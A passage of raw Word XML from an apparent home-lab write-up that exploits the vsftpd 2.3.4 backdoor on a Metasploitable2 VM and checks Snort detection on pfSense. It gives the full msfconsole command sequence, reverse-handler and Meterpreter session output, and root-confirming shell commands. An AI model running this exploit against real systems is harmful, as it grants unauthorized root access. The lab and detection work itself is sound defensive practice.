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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 02: Metasploitable vsftpd 2.3.4 Backdoor Exploitation (Remote Root Access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: ✅ Exploitation &amp; Native Detection Complete — SIEM Forwarding In Progress (see Follow-On Work)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulate an attacker exploiting a known backdoor vulnerability in vsftpd 2.3.4 to gain unauthenticated remote root access on a target host, and verify that the network IDS (Snort, running on pfSense) detects the resulting post-exploitation activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">T1190 — Exploit Public-Facing Application. The attacker leverages a known vulnerability (a maliciously planted backdoor) in an internet-facing service (vsftpd/FTP) to gain initial access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">T1059.004 — Command and Scripting Interpreter: Unix Shell. Post-exploitation commands (whoami, id, hostname, uname) were executed via an interactive shell obtained through the Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment at Time of Test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker: Kali Linux, 192.168.1.102 (LAN segment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Metasploitable2, 192.168.2.100 (DMZ segment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS/IPS: Snort on pfSense’s LAN interface, Legacy IPS mode, Block Offenders enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tooling: Metasploit Framework (msfconsole), module exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS 192.168.2.100</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 192.168.1.102</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First attempt — exploit completed but no session created</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The first run of the exploit detected the vulnerable banner but failed to establish a session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.1.102:4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 192.168.2.100:21 - Running automatic check</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 192.168.2.100:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.2.100:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    backdoor may be present</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[!] 192.168.2.100:21 - Unable to connect to backdoor on 6200/TCP. Cooldown?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Root cause: the vsftpd 2.3.4 backdoor is triggered by a specific character sequence sent during the initial FTP login exchange, which spawns a one-time listener on port 6200/TCP. If the triggering connection is interrupted, times out, or is retried too quickly after a prior attempt, the listener may not be up yet when Metasploit tries to connect to it, producing exactly this “cooldown” failure. This is a known timing characteristic of the backdoor, not a sign the target is unaffected — a clean retry resolves it, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Second attempt — backdoor spawned, session established</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.1.102:4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] 192.168.2.100:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.2.100:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    backdoor may be present</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.2.100:21 - Backdoor has been spawned!</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened (192.168.1.102:4444 -&gt; 192.168.2.100:55602)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    at 2026-07-14 04:40:11 -0400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📸 screenshots/scenario02-vsftpd-service-restart.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From within the Meterpreter shell, the following commands confirmed unauthenticated remote root access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploitable</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📸 screenshots/scenario02-exploitation-and-detection-combined.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection — Snort Alert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Snort’s native Alert log (Services → Snort → Alerts) recorded a signature match tied directly to the post-exploitation command output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GID:SID:      1:2100498</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:  GPL ATTACK_RESPONSE id check returned root</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Source:       192.168.2.100:6200 (Metasploitable)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Destination:  192.168.1.102:43729 (Kali)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:         2026-07-14 08:40:11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">An earlier, unrelated alert was also logged during the first (failed) exploit attempt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GID:SID:      125:2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:  (ftp_telnet) Invalid FTP Command</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Source:       192.168.1.102:36274 -&gt; 192.168.2.100:21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="2"/>
        </w:pBdr>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
